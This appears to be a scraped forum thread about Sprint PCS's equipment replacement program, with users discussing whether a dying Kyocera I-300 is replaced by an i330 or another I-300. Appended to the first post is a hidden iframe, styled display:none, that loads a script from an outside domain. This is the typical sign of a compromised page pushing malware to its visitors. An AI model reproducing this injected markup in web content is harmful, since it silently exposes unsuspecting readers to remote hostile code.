+ Reply to Thread

Question Sprint PCS Equipment Replacement Program. What do they send?

My I-300 is on the verge of dying and I suppose it's time to upgrade to a vision enabled phone.

Has anyone used the Equipment replacement program recently?
    If so what did they send you?

I noticed they recently stopped selling the I-300 on the sprintpcs website. So I'm wondering if I paid the $35 to replace it would they send me a vision enabled pda phone, or will they just send me another I-300?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    much speculation here,

but for the most part if your '300 dies and you wanted to use the insurance, they would most likely send you an i330.. they may give you a choice of i330, treo 300 or MAYBE (though rare) the treo 6. more than likely you will get a i330 which is vision enabled and it may or may not be a refurb.

they will send you the phone, charger, battery and a return box postage paid for you to return the old phone. after you pat the deductible, they send it out to you pretty quick.. in a little as 2 days.

you only get 2 claims per calendar year...

Thanks, I'll probably file a claim before it dies totally. Hopefully they don't have any I300s left to send me. It's a nice phone but I'm finding a lot of times the internet speed of a vision enabled phone will save me a lot of time.

They replaced my 300 with a 300.

Originally posted by rbbloom
    They replaced my 300 with a 300.
    When did you get it replaced?
    Thanks.

More than likely they will replace it with a Refub i300, as far as i know they have plenty in stock. Let us know though if you get something diffrent.

Oh well. At least the refurb replacement will be resellable. I can always sell it on Ebay for $100 to $150.

Is there a Sprint palm phone that can be used on Verizon's network eventually?

Some of the other family members on the plan aren't too happy with Sprint and may want to go to Verizon as soon as we can port our phone numbers.

Just and update:
    Filed my claim just before Thanksgiving, lo and behold they sent me an I330. That saves me a lot of headaches.